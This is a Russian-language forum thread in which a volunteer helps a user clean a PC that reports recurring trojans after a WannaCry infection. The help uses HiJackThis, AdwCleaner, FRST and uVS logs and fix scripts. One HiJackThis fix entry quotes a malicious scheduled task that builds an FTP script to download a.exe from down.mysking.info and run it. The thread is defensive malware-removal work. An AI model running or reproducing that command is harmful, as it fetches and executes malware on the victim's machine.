Saltant 0 Опубликовано 3 июня, 2017 Share Опубликовано 3 июня, 2017 Неоднократно в течении недели касперский антивирус находил в памяти трояна - Trojan.Multi.GenAutorunReg.a удалял, но он все равно появляется. Проблема с троянами началась после того как комп подхватил WannaCry, при заражении работал антивирус касперского, троян wannacry был перехвачен и убит, ни какие файлы не пострадали, но вот после этого стали находится трояны в system memory (возможно совпадение, возможно нет). Прикрепляю все необходимые файлы логов. Помогите разобраться откуда лезут трояны. CollectionLog-2017.06.03-18.42.zip Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 3 июня, 2017 Share Опубликовано 3 июня, 2017 Здравствуйте,HiJackThis (из каталога автологгера) профиксить O8 - Extra context menu item: Закачать ВСЕ при помощи Download Master - (no file) O8 - Extra context menu item: Закачать при помощи Download Master - (no file) O8 - Extra context menu item: Передать на удаленную закачку DM - (no file) O9-32 - Extra button: (no name) - HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no file) O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe - Подготовьте лог AdwCleaner и приложите его в теме. Цитата Ссылка на сообщение Поделиться на другие сайты
Saltant 0 Опубликовано 3 июня, 2017 Автор Share Опубликовано 3 июня, 2017 Выполнил все по пунктам, прикрепляю лог AdwCleaner AdwCleanerC0.txt Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 3 июня, 2017 Share Опубликовано 3 июня, 2017 Удалите Advanced SystemCare через установку программ в панели управления (если присутствует).Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите. Цитата Ссылка на сообщение Поделиться на другие сайты
Saltant 0 Опубликовано 3 июня, 2017 Автор Share Опубликовано 3 июня, 2017 Advanced SystemCare - нету в панеле управления удаления программ. В AdwCleaner удалил всё предложенное еще при первом запуске (когда делал лог), там была какая то ерунда от mail.ru и этот Advanced SystemCare. Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 3 июня, 2017 Share Опубликовано 3 июня, 2017 - Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5". Нажмите кнопку Scan. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении. Цитата Ссылка на сообщение Поделиться на другие сайты
Saltant 0 Опубликовано 3 июня, 2017 Автор Share Опубликовано 3 июня, 2017 Сканирование с помощью Farbar Recovery Scan Tool произведено, прикрепляю логи. FRST.txt Addition.txt Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 3 июня, 2017 Share Опубликовано 3 июня, 2017 Знакома ли Вам настройка? HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{551a7668-aec7-4407-ad57-7389b2c17629} <======= ATTENTION (Restriction - IP) Закройте и сохраните все открытые приложения. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:CreateRestorePoint: CloseProcesses: HKLM-x32\...\Run: [] => [X] File: C:\Program Files (x86)\puush\puush.exe HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION FF Plugin: @microsoft.com/GENUINE -> disabled [No File] FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File] CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx File: C:\Windows\SysWOW64\srvany.exe S3 BRDriver64_1_3_3_7ECFDFEA; no ImagePath S3 BCM42RLY; system32\drivers\BCM42RLY.sys [X] 2017-05-22 14:57 - 2017-06-03 16:12 - 00000060 _____ C:\Windows\system32\s 2017-06-03 19:33 - 2017-03-24 20:46 - 00000000 ____D C:\Users\Администратор\AppData\Roaming\IObit 2017-06-03 19:33 - 2017-03-24 20:46 - 00000000 ____D C:\Users\Администратор\AppData\LocalLow\IObit 2017-06-03 19:33 - 2017-03-24 20:45 - 00000000 ____D C:\Users\Все пользователи\IObit 2017-06-03 19:33 - 2017-03-24 20:45 - 00000000 ____D C:\ProgramData\IObit 2017-04-16 21:26 - 2017-04-16 21:26 - 0000016 _____ () C:\ProgramData\mntemp File: C:\Users\Администратор\PCPE Setup.exe 2006-05-24 08:10 - 2006-05-24 08:10 - 0455600 ____R (Macrovision Corporation) C:\Users\Saltant\AppData\Local\Temp\_is50DD.exe 2017-04-18 22:27 - 2017-04-18 22:28 - 59432328 _____ () C:\Users\Администратор\AppData\Local\Temp\raptrpatch.exe 2017-04-18 22:27 - 2017-04-18 22:27 - 0221632 _____ () C:\Users\Администратор\AppData\Local\Temp\raptr_stub.exe 2017-05-04 21:48 - 2017-05-04 21:48 - 2085648 _____ (Vitzo Limited ) C:\Users\Администратор\AppData\Local\Temp\tmp17D0.tmp.exe Task: {3D6AF505-229F-4F75-807C-E46B6339A852} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION Task: {90DEB20D-1982-4CAE-9CFD-C58993F1A336} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION AlternateDataStreams: C:\ProgramData\TEMP:41ADDB8A [130] AlternateDataStreams: C:\ProgramData\TEMP:A064CECC [144] AlternateDataStreams: C:\ProgramData\TEMP:B242F995 [104] AlternateDataStreams: C:\Users\Все пользователи\TEMP:41ADDB8A [130] AlternateDataStreams: C:\Users\Все пользователи\TEMP:A064CECC [144] AlternateDataStreams: C:\Users\Все пользователи\TEMP:B242F995 [104] Reboot: Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Цитата Ссылка на сообщение Поделиться на другие сайты
Saltant 0 Опубликовано 3 июня, 2017 Автор Share Опубликовано 3 июня, 2017 Настройка HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{551a7668-aec7-4407-ad57-7389b2c17629} <======= ATTENTION (Restriction - IP) Мне не знакома, по крайней мере я сам её не добавлял. Прикрепляю лог FRST Fixlog.txt Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 3 июня, 2017 Share Опубликовано 3 июня, 2017 Мне не знакома, по крайней мере я сам её не добавлял. Используете ли Вы VPN на ПК? Цитата Ссылка на сообщение Поделиться на другие сайты
Saltant 0 Опубликовано 3 июня, 2017 Автор Share Опубликовано 3 июня, 2017 (изменено) Нет у меня интернет по Wi-Fi, вот скрин доступных подключений сети. Изменено 3 июня, 2017 пользователем Saltant Цитата Ссылка на сообщение Поделиться на другие сайты
Saltant 0 Опубликовано 4 июня, 2017 Автор Share Опубликовано 4 июня, 2017 Видимо Oracle VirtualBox создало VPN у меня. Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 4 июня, 2017 Share Опубликовано 4 июня, 2017 Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS. Цитата Ссылка на сообщение Поделиться на другие сайты
Saltant 0 Опубликовано 4 июня, 2017 Автор Share Опубликовано 4 июня, 2017 Прикрепляю лог созданный с помощью Universal Virus Sniffer SALTANT-PK_2017-06-04_17-51-17.7z Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 4 июня, 2017 Share Опубликовано 4 июня, 2017 Выполните скрипт в uVS: ;uVS v4.0.2 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c OFFSGNSAVE BREG ;---------command-block--------- delref WMI_.[FUCKYOUMM2_FILTER] zoo %SystemRoot%\KMSEM\SHADOW.KMS zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\UMMYVIDEODOWNLOADER\UNINS000.EXE delref %SystemDrive%\USERS\SALTANT\APPDATA\ROAMING\QIPGUARD\QIPGUARD.EXE delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\JAVA\JRE1.8.0_121\BIN\JP2IEXP.DLL delref %SystemDrive%\PROGRAM FILES (X86)\JAVA\JRE1.8.0_45\BIN\JP2IEXP.DLL delref %SystemDrive%\PROGRAM FILES (X86)\JAVA\JRE1.8.0_51\BIN\JP2IEXP.DLL delref %SystemDrive%\PROGRAM FILES (X86)\JAVA\JRE1.8.0_66\BIN\JP2IEXP.DLL delref %SystemDrive%\PROGRAM FILES (X86)\JAVA\JRE1.8.0_71\BIN\JP2IEXP.DLL delref %SystemDrive%\PROGRAM FILES\JAVA\JRE1.8.0_131\BIN\NPJPI160_43.DLL delref %SystemDrive%\PROGRAM FILES\JAVA\JRE1.8.0_131\BIN\NPJPI180_131.DLL delref %SystemDrive%\PROGRAMDATA\SSWTOOL\APP\XSERVICE.EXE delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\CHROME_BITS_12372_20234\393_ALL_STHSET.CRX apply restart Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.